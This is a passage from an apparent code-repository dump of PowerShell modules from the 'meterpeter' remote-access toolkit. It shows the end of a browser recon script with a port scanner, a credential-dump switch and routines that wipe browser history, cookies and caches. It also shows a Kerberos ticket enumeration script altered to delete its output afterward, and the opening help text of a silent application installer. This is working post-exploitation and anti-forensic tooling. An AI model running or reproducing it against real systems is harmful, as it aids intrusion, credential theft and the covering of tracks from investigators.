Explorer\\Extensions\" )\r\n        $Registry_Keys|Get-ChildItem -Recurse -ErrorAction SilentlyContinue|Select -ExpandProperty PSChildName |  \r\n     
       ForEach-Object { \r\n                If(Test-Path \"HKCR:\\CLSID\\$_\"){ \r\n                    $CLSID = Get-ItemProperty -Path \"HKCR:\\CLSID\\$_\" | Select-Object @{n=\"Name\";e=\"(default)\"}\r\n                    $CLSIData = $CLSID -replace '@{Name=','' -replace '}',''\r\n                    echo \"$CLSIData\" >> $LogFilePath\\BrowserEnum.log\r\n                }\r\n            }\r\n    }\r\n\r\n    ## Retrieve firefox addons\r\n    echo \"`n`n[ Firefox ]\" >> $LogFilePath\\BrowserEnum.log\r\n    If(-not(Test-Path \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default\\extensions.json\")){\r\n        $Bookmarks_Path = \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\\extensions.json\" # (IEFP)\r\n        If(-not(Test-Path \"$Bookmarks_Path\")){\r\n            echo \"{None addons found}\" >> $LogFilePath\\BrowserEnum.log\r\n        }else{\r\n            $Bookmarks_Path = \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\\extensions.json\" # (IEFP)\r\n            $Json = Get-Content \"$Bookmarks_Path\" -Raw|ConvertFrom-Json|select *\r\n            $Json.addons|select-object -property defaultLocale|Select-Object -ExpandProperty defaultLocale|Select-Object Name,description >> $LogFilePath\\BrowserEnum.log\r\n        }  \r\n    }else{\r\n        $Bookmarks_Path = \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default\\extensions.json\"\r\n        $Json = Get-Content \"$Bookmarks_Path\" -Raw|ConvertFrom-Json|select *\r\n        $Json.addons|select-object -property defaultLocale|Select-Object -ExpandProperty defaultLocale|Select-Object Name,description >> $LogFilePath\\BrowserEnum.log\r\n    }\r\n\r\n    ## Retrieve Chrome addons\r\n    echo \"`n`n[ Chrome ]\" >> $LogFilePath\\BrowserEnum.log\r\n    If(-not(Test-Path \"\\\\$env:COMPUTERNAME\\c$\\users\\*\\appdata\\local\\Google\\Chrome\\User Data\\Default\\Extensions\\*\\*\\manifest.json\" -ErrorAction SilentlyContinue)){\r\n        echo \"{None addons found}\" >> 
$LogFilePath\\BrowserEnum.log\r\n    }else{\r\n        $Json = Get-Content \"\\\\$env:COMPUTERNAME\\c$\\users\\*\\appdata\\local\\Google\\Chrome\\User Data\\Default\\Extensions\\*\\*\\manifest.json\" -Raw -ErrorAction SilentlyContinue|ConvertFrom-Json|select *\r\n        $Json|select-object -property name,version,update_url >> $LogFilePath\\BrowserEnum.log\r\n    }\r\n}\r\n \r\n\r\n ## Function tcp port scanner\r\nfunction PORTSCANNER {\r\n[int]$counter = 0\r\n\r\n    If(-not($param2)){$PortRange = \"21,22,23,25,80,110,135,137,139,443,445,666,1433,3389,8080\"}else{$PortRange = $param2}\r\n    $Remote_Host = (Test-Connection -ComputerName (hostname) -Count 1 -ErrorAction SilentlyContinue).IPV4Address.IPAddressToString\r\n    echo \"`n`nRemote-Host   Status   Proto  Port\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"-----------   ------   -----  ----\" >> $LogFilePath\\BrowserEnum.log\r\n    $PortRange -split(',')|Foreach-Object -Process {\r\n        If((Test-NetConnection $Remote_Host -Port $_ -WarningAction SilentlyContinue).tcpTestSucceeded -eq $true){\r\n            echo \"$Remote_Host  Open     tcp    $_ *\" >> $LogFilePath\\BrowserEnum.log\r\n            $counter++\r\n        }else{\r\n            echo \"$Remote_Host  Closed   tcp    $_\" >> $LogFilePath\\BrowserEnum.log\r\n        }\r\n    }\r\n    echo \"`nTotal open tcp ports found => $counter\" >> $LogFilePath\\BrowserEnum.log\r\n}\r\n\r\n\r\n## Function browser cleaner\r\nfunction BROWSER_CLEANTRACKS {\r\n[int]$DaysToDelete = 0 # delete all files less than the current date ..\r\n\r\n    If($RUIUIUi0 -iMatch '^(yes)$')\r\n    {\r\n       ## Global cleaning\r\n       ipconfig /flushdns|Out-Null\r\n       C:\\Windows\\System32\\rundll32.exe InetCpl.cpl, ClearMyTracksByProcess 1|Out-Null     #  Clear History\r\n       C:\\Windows\\System32\\rundll32.exe InetCpl.cpl, ClearMyTracksByProcess 2|Out-Null     #  Clear Cookies\r\n       C:\\Windows\\System32\\rundll32.exe InetCpl.cpl, ClearMyTracksByProcess 
8|Out-Null     #  Clear Temporary Files\r\n       # C:\\Windows\\System32\\rundll32.exe InetCpl.cpl, ClearMyTracksByProcess 255|Out-Null #  Clear cookies, history data, internet files, and passwords\r\n    }\r\n\r\n\r\n    ## Clean Internet Explorer temporary files\r\n    echo \"   [IE|MsEdge Browser]\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"   $Env:LOCALAPPDATA\\Microsoft\\Windows\\WER\\ERC\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"   $Env:LOCALAPPDATA\\Microsoft\\Windows\\INetCache\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"   $Env:LOCALAPPDATA\\Microsoft\\Windows\\INetCookies\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"   $Env:LOCALAPPDATA\\Microsoft\\Windows\\IEDownloadHistory\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"   $Env:LOCALAPPDATA\\Microsoft\\Windows\\Temporary Internet Files\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"   ----------------------\" >> $LogFilePath\\BrowserEnum.log\r\n\r\n    ## Common locations\r\n    $TempFiles = \"$Env:LOCALAPPDATA\\Microsoft\\Windows\\WER\\ERC\"\r\n    $InetCache = \"$Env:LOCALAPPDATA\\Microsoft\\Windows\\INetCache\"\r\n    $Cachecook = \"$Env:LOCALAPPDATA\\Microsoft\\Windows\\INetCookies\"\r\n    $CacheDown = \"$Env:LOCALAPPDATA\\Microsoft\\Windows\\IEDownloadHistory\"\r\n    $CacheFile = \"$Env:LOCALAPPDATA\\Microsoft\\Windows\\Temporary Internet Files\"\r\n\r\n    ## Locations Recursive Query\r\n    $RemoveMe = (Get-ChildItem -Path \"$CacheFile\",\"$TempFiles\",\"$InetCache\",\"$Cachecook\",\"$CacheDown\" -Recurse -EA SilentlyContinue|Where-Object { ($_.CreationTime -lt $(Get-Date).AddDays(-$DaysToDelete)) -and $_.PSIsContainer -eq $false }).FullName\r\n\r\n    If(-not([string]::IsNullOrEmpty($RemoveMe)))\r\n    {\r\n       ForEach($Item in $RemoveMe)\r\n       {\r\n          ## Delete selected files\r\n          $NameOnly = (Get-ChildItem -Path \"$Item\" -EA SilentlyContinue).Name\r\n          echo \"   Deleted:: $NameOnly\" >> $LogFilePath\\BrowserEnum.log\r\n          
Remove-Item -Path \"$Item\" -Force -EA SilentlyContinue\r\n       }\r\n    }\r\n    Else\r\n    {\r\n       echo \"   None temp files found.\" >> $LogFilePath\\BrowserEnum.log\r\n    }\r\n\r\n\r\n    ## Clean Mozilla Firefox temporary files\r\n    echo \"`n`n   [FireFox Browser]\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"   $Env:LOCALAPPDATA\\Mozilla\\Firefox\\Profiles\\*.default\\cache\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"   $Env:LOCALAPPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\\cache\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"   $Env:LOCALAPPDATA\\Mozilla\\Firefox\\Profiles\\*.default\\cache2\\entries\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"   $Env:LOCALAPPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\\cache2\\entries\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"   ----------------------\" >> $LogFilePath\\BrowserEnum.log\r\n\r\n    ## Common locations\r\n    $CacheFile = \"$Env:LOCALAPPDATA\\Mozilla\\Firefox\\Profiles\\*.default\\cache\"\r\n    $TempFiles = \"$Env:LOCALAPPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\\cache\"\r\n    $OutraFile = \"$Env:LOCALAPPDATA\\Mozilla\\Firefox\\Profiles\\*.default\\cache2\\entries\"\r\n    $IefpFiles = \"$Env:LOCALAPPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\\cache2\\entries\"\r\n\r\n    ## Locations Recursive Query\r\n    $RemoveMe = (Get-ChildItem -Path \"$CacheFile\",\"$TempFiles\",\"$OutraFile\",\"$IefpFiles\" -Recurse -EA SilentlyContinue|Where-Object { ($_.CreationTime -lt $(Get-Date).AddDays(-$DaysToDelete)) -and $_.PSIsContainer -eq $false }).FullName\r\n\r\n    If(-not([string]::IsNullOrEmpty($RemoveMe)))\r\n    {\r\n       ForEach($Item in $RemoveMe)\r\n       {\r\n          ## Delete selected files\r\n          $NameOnly = (Get-ChildItem -Path \"$Item\" -EA SilentlyContinue).Name\r\n          echo \"   Deleted:: $NameOnly\" >> $LogFilePath\\BrowserEnum.log\r\n          Remove-Item -Path \"$Item\" -Force -EA SilentlyContinue\r\n       }\r\n    
}\r\n    Else\r\n    {\r\n       echo \"   None temp files found.\" >> $LogFilePath\\BrowserEnum.log\r\n    }\r\n\r\n\r\n    ## Clean Google Chrome temporary files\r\n    echo \"`n`n   [Chrome Browser]\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"   $Env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Cache\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"   $Env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Cookies\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"   $Env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\History\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"   $Env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\VisitedLinks\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"   $Env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Cache2\\entries\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"   ----------------------\" >> $LogFilePath\\BrowserEnum.log\r\n\r\n    ## Common locations\r\n    $CacheFile = \"$Env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Cache\"\r\n    $Cachecook = \"$Env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Cookies\"\r\n    $Cachehist = \"$Env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\History\"\r\n    $Cachelink = \"$Env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\VisitedLinks\"\r\n    $TempFiles = \"$Env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Cache2\\entries\"\r\n\r\n    ## Locations Recursive Query\r\n    $RemoveMe = (Get-ChildItem -Path \"$CacheFile\",\"$Cachecook\",\"$Cachehist\",\"$Cachelink\",\"$TempFiles\" -Recurse -EA SilentlyContinue|Where-Object{ ($_.CreationTime -lt $(Get-Date).AddDays(-$DaysToDelete)) -and $_.PSIsContainer -eq $false }).FullName\r\n\r\n    If(-not([string]::IsNullOrEmpty($RemoveMe)))\r\n    {\r\n       ForEach($Item in $RemoveMe)\r\n       {\r\n          ## Delete selected files\r\n          $NameOnly = (Get-ChildItem -Path \"$Item\" -EA SilentlyContinue).Name\r\n          echo \"   Deleted:: $NameOnly\" >> $LogFilePath\\BrowserEnum.log\r\n      
    Remove-Item -Path \"$Item\" -Force -EA SilentlyContinue\r\n       }\r\n    }\r\n    Else\r\n    {\r\n       echo \"   None temp files found.\" >> $LogFilePath\\BrowserEnum.log\r\n    }\r\n\r\n\r\n    ## Clean Opera temporary files\r\n    echo \"`n`n   [Opera Browser]\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"   $Env:LOCALAPPDATA\\Opera Software\\Opera GX Stable\\Cache\\Cache_Data\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"   ----------------------\" >> $LogFilePath\\BrowserEnum.log\r\n\r\n    ## Common locations\r\n    $OpCache = \"$Env:LOCALAPPDATA\\Opera Software\"\r\n    $OpName = (Get-ChildItem -Path \"$OpCache\" -Recurse -Force|Where-Object {$_.PSIsContainer -eq $true -and $_.Name -match \"^(Cache)$\"}).FullName\r\n\r\n    ## Locations Recursive Query\r\n    $OpClean = (Get-ChildItem -Path \"${OpName}\\Cache_Data\"|Where-Object {$_.PSIsContainer -eq $false -and $_.Name -ne \"index\"}).FullName\r\n\r\n    If(-not([string]::IsNullOrEmpty($OpClean)))\r\n    {\r\n       ForEach($Item in $OpClean)\r\n       {\r\n          ## Delete selected files\r\n          $NameOnly = (Get-ChildItem -Path \"$Item\" -EA SilentlyContinue).Name\r\n          echo \"   Deleted:: $NameOnly\" >> $LogFilePath\\BrowserEnum.log\r\n          Remove-Item -Path \"$Item\" -Force -EA SilentlyContinue\r\n       }\r\n    }\r\n    Else\r\n    {\r\n       echo \"   None temp files found.\" >> $LogFilePath\\BrowserEnum.log\r\n    }\r\n\r\n\r\n    ## Clean Brave temporary files\r\n    echo \"`n`n   [Brave Browser]\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"   $Env:LOCALAPPDATA\\BraveSoftware\\User Data\\Default\\Cache\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"   $Env:LOCALAPPDATA\\BraveSoftware\\Brave-Browser\\UserData\\Default\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"   $Env:LOCALAPPDATA\\BraveSoftware\\User Data\\Default\\Cache\\Cache_Data\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"   ----------------------\" >> $LogFilePath\\BrowserEnum.log\r\n\r\n    
## Common locations\r\n    $OpCache = \"$Env:LOCALAPPDATA\\BraveSoftware\\User Data\\Default\\Cache\"\r\n    $OpUserd = \"$Env:LOCALAPPDATA\\BraveSoftware\\Brave-Browser\\UserData\\Default\"\r\n    $OpDatas = \"$Env:LOCALAPPDATA\\BraveSoftware\\User Data\\Default\\Cache\\Cache_Data\"\r\n\r\n    ## Locations Recursive Query\r\n    $OpClean = (Get-ChildItem -Path \"${OpCache}\",\"${OpDatas}\",\"${OpUserd}\"|Where-Object {$_.PSIsContainer -eq $false}).FullName\r\n\r\n    If(-not([string]::IsNullOrEmpty($OpClean)))\r\n    {\r\n       ForEach($Item in $OpClean)\r\n       {\r\n          ## Delete selected files\r\n          $NameOnly = (Get-ChildItem -Path \"$Item\" -EA SilentlyContinue).Name\r\n          echo \"   Deleted:: $NameOnly\" >> $LogFilePath\\BrowserEnum.log\r\n          Remove-Item -Path \"$Item\" -Force -EA SilentlyContinue\r\n       }\r\n    }\r\n    Else\r\n    {\r\n       echo \"   None temp files found.\" >> $LogFilePath\\BrowserEnum.log\r\n    }\r\n\r\n}\r\n\r\n## Jump Links (Functions)\r\nIf($param1 -eq \"-IE\"){IE_Dump}\r\nIf($param1 -eq \"-CHROME\"){CHROME}\r\nIf($param1 -eq \"-ADDONS\"){ADDONS}\r\nIf($param1 -eq \"-FIREFOX\"){FIREFOX}\r\nIf($param1 -eq \"-OPERA\"){OPERA}\r\nIf($param1 -eq \"-CREDS\"){CREDS_DUMP}\r\nIf($param1 -eq \"-SCAN\"){PORTSCANNER}\r\nIf($param1 -eq \"-RECON\"){BROWSER_RECON}\r\nIf($param1 -eq \"-CLEAN\"){BROWSER_CLEANTRACKS}\r\nIf($param1 -eq \"-ALL\"){BROWSER_RECON;IE_Dump;FIREFOX;CHROME;OPERA}\r\n\r\n## NOTE: ForEach - Build PSObject displays ..\r\n# $StoreData = ForEach ($Key in $Input_String){\r\n#     New-Object -TypeName PSObject -Property @{\r\n#         Data = $Key\r\n#     } \r\n# }\r\n# Write-Host $StoreData|Out-File \"$env:tmp\\report.log\"\r\n\r\n## Retrieve Remote Info from LogFile\r\nWrite-Host \"\"\r\nGet-Content \"$LogFilePath\\BrowserEnum.log\"\r\nRemove-Item -Path \"$LogFilePath\\BrowserEnum.log\" -Force\r\nExit\r\n"
  },
  {
    "path": "mimiRatz/GetKerbTix.ps1",
    "content": "﻿#************************************************\r\n# GetKerbTix.ps1\r\n# Version 1.0\r\n# Date: 6-11-2014\r\n# Author: Tim Springston [MSFT]\r\n# Description: On a specific computer the script is ran on, \r\n#  this script finds all logon sessions which have Kerberos\r\n# \ttickets cached and enumerates the tickets and any ticket granting tickets.\r\n# The tickets may be from remote or interactive users and may be \r\n#  any logon type session (network, batch, interactive, remote interactive...).\r\n# This script will run on Windows Server 2008/Vista and later.\r\n#************************************************\r\n\r\n$FormatEnumerationLimit = -1\r\n$ComputerName = $env:COMPUTERNAME\r\n$UserName = [Security.Principal.WindowsIdentity]::GetCurrent().name\r\ntry{#Supress Domain not foud outputs\r\n$ComputerDomain = [System.DirectoryServices.ActiveDirectory.Domain]::GetComputerDomain().name\r\n}catch{}\r\n$Date = Get-Date\r\n\r\n\r\n#Prepare an output file to place info into.\r\n$ExportFile = \"C:\\windows\\temp\\\" + $ComputerName + \"_CachedKerberosTickets.txt\"\r\n\"Cached Kerberos Tickets\" | Out-File $ExportFile -Encoding utf8\r\n\"Logged on User:$UserName\" | Out-File $ExportFile -Append -Encoding utf8\r\n\"Computer name: $ComputerName\" | Out-File $ExportFile -Append -Encoding utf8\r\n\"Computer Domain: $ComputerDomain\" | Out-File $ExportFile -Append -Encoding utf8\r\n\"Date: $Date\" | Out-File $ExportFile -Append -Encoding utf8\r\n\"************************************\" | Out-File $ExportFile -Append -Encoding utf8\r\n\r\nfunction GetKerbSessions\r\n\t{\r\n\t$Sessions = @()\r\n\t$WMILogonSessions = gwmi win32_LogonSession\r\n\tforeach ($WMILogonSession in $WMILogonSessions)\r\n\t\t{\r\n\t\t$LUID = [Convert]::ToString($WMILogonSession.LogonID, 16)\r\n\t\t$LUID = '0x' + $LUID\r\n\t\t$Sessions += $LUID\r\n\t\t}\r\n\treturn $sessions\r\n\t}\r\n\t\r\nfunction GetKerbSessionInfo\r\n\t{\r\n\t$OS = gwmi win32_operatingsystem\r\n\t$sessions = 
New-Object PSObject\r\n\tif ($OS.Buildnumber -ge 9200)\r\n\t\t{\r\n\t\t$KlistSessions = klist sessions\r\n\t\t$Counter = 0\r\n\r\n\t\tforeach ($item in $KlistSessions)\r\n\t\t\t{\r\n\t\t\tif ($item -match \"^\\[.*\\]\")\r\n\t\t\t\t{\r\n\t\t\t\t$LogonId = $item.split(' ')[3]\r\n\t\t\t\t$LogonId = $LogonId.Replace('0:','')\r\n\t\t\t\t$Identity = $item.split(' ')[4]\r\n\t\t\t\t$Token5 = $item.Split(' ')[5]\r\n\t\t\t\t$AuthnMethod = $Token5.Split(':')[0]\r\n\t\t\t\t$LogonType = $Token5.Split(':')[1]\r\n\t\t\t\t$Session = New-Object PSObject\r\n\t\t\t\tAdd-Member -InputObject $Session -MemberType NoteProperty -Name \"SessionID\" -Value $LogonId\r\n\t\t\t\tAdd-Member -InputObject $Session -MemberType NoteProperty -Name \"Identity\" -Value $Identity\r\n\t\t\t\tAdd-Member -InputObject $Session -MemberType NoteProperty -Name \"Authentication Method\" -Value $AuthnMethod\t\t\t\r\n\t\t\t\tAdd-Member -InputObject $Session -MemberType NoteProperty -Name \"Logon Type\" -Value $LogonType\r\n\t\t\t\t\r\n\t\t\t\tAdd-Member -InputObject $sessions -MemberType NoteProperty -Name $LogonId -Value $Session\r\n\t\t\t\t$Session = $null\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\tif ($OS.Buildnumber -lt 9200)\r\n\t\t{\r\n\t\t$WMILogonSessions = gwmi win32_LogonSession\r\n\t\tforeach ($WMILogonSession in $WMILogonSessions)\r\n\t\t\t{\r\n\t\t\t$LUID = [Convert]::ToString($WMILogonSession.LogonID, 16)\r\n\t\t\t$LUID = '0x' + $LUID\r\n\t\t\t$Session = New-Object PSObject\r\n\t\t\tAdd-Member -InputObject $Session -MemberType NoteProperty -Name \"SessionID\" -Value $LUID\r\n\t\t\tAdd-Member -InputObject $Session -MemberType NoteProperty -Name \"Identity\" -Value \"Not available\"\r\n\t\t\tAdd-Member -InputObject $Session -MemberType NoteProperty -Name \"Authentication Method\" -Value $WMILogonSession.AuthenticationPackage\t\t\r\n\t\t\tAdd-Member -InputObject $Session -MemberType NoteProperty -Name \"Logon Type\" -Value $WMILogonSession.LogonType\r\n\t\t\t\t\r\n\t\t\tAdd-Member -InputObject $sessions 
-MemberType NoteProperty -Name $LUID -Value $Session\r\n\t\t\t$Session = $null\r\n\t\t\t}\r\n\t\t}\r\n\treturn $sessions\r\n\t}\r\n\r\nfunction ReturnSessionTGTs\r\n\t{\r\n\tparam ($SessionID = $null)\r\n\tif ($SessionID -eq $null)\r\n\t\t{\r\n\t\t$RawTGT =  klist.exe tgt\r\n\t\t}\r\n\t\telse\r\n\t\t\t{\r\n\t\t\t$RawTGT =  klist.exe tgt -li $sessionID\r\n\t\t\t}\r\n\t$TGT = @()\r\n\tforeach ($Line in $RawTGT)\r\n\t\t{\r\n\t\tif ($Line.length -ge 1)\r\n\t\t\t{\r\n\t\t\t$TGT += $Line\r\n\t\t\t}\r\n\t\t}\r\n\tif ($TGT -contains 'Error calling API LsaCallAuthenticationPackage (Ticket Granting Ticket substatus): 1312')\r\n\t\t{$TGT = 'No ticket granting ticket cached in session.'}\r\n\treturn $TGT\r\n\t}\t\r\n\r\nfunction ReturnSessionTickets \r\n\t{\r\n\tparam ($SessionID = $null)\r\n\t$OS = gwmi win32_operatingsystem\r\n\tif ($SessionID -eq $null)\r\n\t\t{\r\n\t\t$TicketsArray =  klist.exe tickets\r\n\t\t}\r\n\t\telse\r\n\t\t\t{\r\n\t\t\t$TicketsArray =  klist.exe tickets -li $sessionID\r\n\t\t\t}\r\n\t$Counter = 0\r\n\t$TicketsObject = New-Object PSObject\r\n\tforeach ($line in $TicketsArray)\r\n\t\t{\r\n\t\tif ($line -match \"^#\\d\")\r\n\t\t\t{\r\n\t\t\t$Ticket = New-Object PSObject\r\n\t\t\t$Number = $Line.Split('>')[0]\r\n\t\t\t$Line1 = $Line.Split('>')[1]\r\n\t\t\t$TicketNumber = \"Ticket \" + $Number\r\n\t\t\t$Client = $Line1 ;\t$Client = $Client.Replace('Client:','') ; $Client = $Client.Substring(2)\r\n\t\t\t$Server = $TicketsArray[$Counter+1]; $Server = $Server.Replace('Server:','') ;$Server = $Server.substring(2)\r\n\t\t\t$KerbTicketEType = $TicketsArray[$Counter+2];$KerbTicketEType = $KerbTicketEType.Replace('KerbTicket Encryption Type:','');$KerbTicketEType = $KerbTicketEType.substring(2)\r\n\t\t\t$TickFlags = $TicketsArray[$Counter+3];$TickFlags = $TickFlags.Replace('Ticket Flags','');$TickFlags = $TickFlags.substring(2)\r\n\t\t\t$StartTime =  $TicketsArray[$Counter+4];$StartTime = $StartTime.Replace('Start Time:','');$StartTime = 
$StartTime.substring(2)\r\n\t\t\t$EndTime = $TicketsArray[$Counter+5];$EndTime = $EndTime.Replace('End Time:','');$EndTime = $EndTime.substring(4)\r\n\t\t\t$RenewTime = $TicketsArray[$Counter+6];$RenewTime = $RenewTime.Replace('Renew Time:','');$RenewTime = $RenewTime.substring(2)\r\n\t\t\t$SessionKey = $TicketsArray[$Counter+7];$SessionKey = $SessionKey.Replace('Session Key Type:','');$SessionKey = $SessionKey.substring(2)\r\n\r\n\t\t\tAdd-Member -InputObject $Ticket -MemberType NoteProperty -Name \"Client\" -Value $Client\r\n\t\t\tAdd-Member -InputObject $Ticket -MemberType NoteProperty -Name \"Server\" -Value $Server\r\n\t\t\tAdd-Member -InputObject $Ticket -MemberType NoteProperty -Name \"KerbTicket Encryption Type\" -Value $KerbTicketEType\r\n\t\t\tAdd-Member -InputObject $Ticket -MemberType NoteProperty -Name \"Ticket Flags\" -Value $TickFlags\r\n\t\t\tAdd-Member -InputObject $Ticket -MemberType NoteProperty -Name \"Start Time\" -Value $StartTime\r\n\t\t\tAdd-Member -InputObject $Ticket -MemberType NoteProperty -Name \"End Time\" -Value $EndTime\r\n\t\t\tAdd-Member -InputObject $Ticket -MemberType NoteProperty -Name \"Renew Time\" -Value $RenewTime\r\n\t\t\tAdd-Member -InputObject $Ticket -MemberType NoteProperty -Name \"Session Key Type\" -Value $SessionKey\r\n\r\n\t\t\tif ($OS.BuildNumber -ge 9200)\r\n\t\t\t\t{\r\n\t\t\t\t$CacheFlags =  $TicketsArray[$Counter+8];$CacheFlags = $CacheFlags.Replace('Cache Flags:','');$CacheFlags = $CacheFlags.substring(2)\r\n\t\t\t\t$KDCCalled = $TicketsArray[$Counter+9];$KDCCalled = $KDCCalled.Replace('Kdc Called:','');$KDCCalled = $KDCCalled.substring(2)\r\n\t\t\t\tAdd-Member -InputObject $Ticket -MemberType NoteProperty -Name \"Cache Flags\" -Value $CacheFlags\r\n\t\t\t\tAdd-Member -InputObject $Ticket -MemberType NoteProperty -Name \"KDC Called\" -Value $KDCCalled\r\n\t\t\t\t}\r\n\t\t\tAdd-Member -InputObject $TicketsObject -MemberType NoteProperty -Name $TicketNumber -Value $Ticket\r\n\t\t\t$Ticket = 
$null\r\n\t\t\t}\r\n\t\t$Counter++\r\n\t\t\r\n\r\n\t\t}\r\n\treturn $TicketsObject\r\n\t}\t\r\n\r\n$OS = gwmi win32_operatingsystem\r\n$sessions = getkerbsessions\r\n$sessioninfo = GetKerbSessionInfo\r\nforeach ($Session in $sessions)\r\n{\t\r\n\t#Get Session details as well\r\n\t$currentsessioninfo = $sessioninfo.$session\r\n\t$ID = $currentsessioninfo.identity\r\n\t$SessionID = $currentsessioninfo.SessionID\r\n\t$LogonType = $currentsessioninfo.'Logon Type'\r\n\t$AuthMethod = $currentsessioninfo.'Authentication Method'\r\n\tif ($OS.Buildnumber -lt 9200)\r\n\t\t{\r\n\t\tWrite-Host \"Kerberos Tickets for LogonID $SessionID\"\r\n\t\t\"Kerberos Tickets for LogonID $SessionID\" | Out-File $ExportFile -Append -Encoding utf8\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\tWrite-Host \"Kerberos Tickets for $ID\"\r\n\t\t\"Kerberos Tickets for $ID\" | Out-File $ExportFile -Append -Encoding utf8\r\n\t\t}\r\n\tWrite-Host \"*****************************\"\r\n\t \"*****************************\" | Out-File $ExportFile -Append -Encoding utf8\r\n\tWrite-Host \"Logon Type: $LogonType\"\r\n\t\"Logon Type: $LogonType\" | Out-File $ExportFile -Append -Encoding utf8\r\n\tWrite-host \"Session ID: $SessionID\"\r\n\t\"Session ID: $SessionID\" | Out-File $ExportFile -Append -Encoding utf8\r\n\tWrite-host \"Auth Method: $AuthMethod\"\r\n\t\"Auth Method: $AuthMethod\" | Out-File $ExportFile -Append -Encoding utf8\r\n\t$SessionTickets = ReturnSessionTickets $Session\r\n\r\n\t\r\n\t$TGT = ReturnSessionTGTs $SessionID\r\n\t$TGT | FL *\r\n\t$TGT | Out-File $ExportFile -Append -Encoding utf8\r\n\t\r\n\tif ($SessionTickets -notmatch 'Ticket')\r\n\t\t{\r\n\t\tWrite-Host \"Session TGT: No tickets for this session in cache.\"\r\n\t\t\"Session TGT: No tickets for this session in cache.\" | Out-File $ExportFile -Append -Encoding utf8\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t$SessionTickets | FL *\r\n\t\t$SessionTickets\t| FL * | Out-File $ExportFile -Append -Encoding utf8 \r\n\t\t}\r\n\tWrite-Host \"`n\"\r\n\t 
\"`n\" | Out-File $ExportFile -Append -Encoding utf8\r\n\r\n}\r\n\r\n#Clean artifacts left behind\r\nRemove-Item -Path \"$ExportFile\" -Force\r\n"
  },
  {
    "path": "mimiRatz/Invoke-Winget.ps1",
    "content": "﻿<#\r\n.SYNOPSIS\r\n   [Silent] manage applications from microsoft store\r\n\r\n   Author: @r00t-3xp10it\r\n   Tested Under: Windows 10 (19044) x64 bits\r\n   Required Dependencies: WinGet, UserLand\r\n   Optional Dependencies: none\r\n   PS cmdlet Dev version: v1.0.4\r\n\r\n.DESCRIPTION\r\n   Auxiliary Module of meterpeter v2.10.13 that invokes winget command line\r\n   tool that enables users to list, discover, install, uninstall applications\r\n   in silent mode under windows 10 (build >16299) or 11 operative system versions.\r\n\r\n.NOTES\r\n   When running winget without administrator privileges, some applications may\r\n   require elevation to install. When the installer runs, Windows will prompt\r\n   you to elevate. If you choose not to elevate application will fail install.\r\n\r\n.Parameter Action\r\n   list, discover, install, uninstall (default: list)\r\n\r\n.Parameter Program\r\n   The application name (default: off)\r\n\r\n.Parameter Id\r\n   The application ID (default: off)\r\n\r\n.Parameter AutoDelete\r\n   Delete cmdlet in the end? (default: off)\r\n\r\n.Parameter Force\r\n   Install winget application on local computer!\r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\Invoke-Winget.ps1 -force\r\n   Install winget appl on local computer!\r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\Invoke-Winget.ps1 -action 'list'\r\n   List installed applications of local computer\r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\Invoke-Winget.ps1 -action 'discover' -Program 'games'\r\n   Search in msstore for applications named 'games' to install\r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\Invoke-Winget.ps1 -action 'install' -Program 'Python 3.11' -Id '9NRWMJP3717K'\r\n   Silent install program 'Python 3.11' with ID '9NRWMJP3717K' from microsoft store\r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\Invoke-Winget.ps1 -action 'uninstall' -Program 'Python 3.11' -Id '9NRWMJP3717K'\r\n   Silent Uninstall program 'Python 3.11' with ID '9NRWMJP3717K' from local computer\r\n\r\n.INPUTS\r\n   None. 
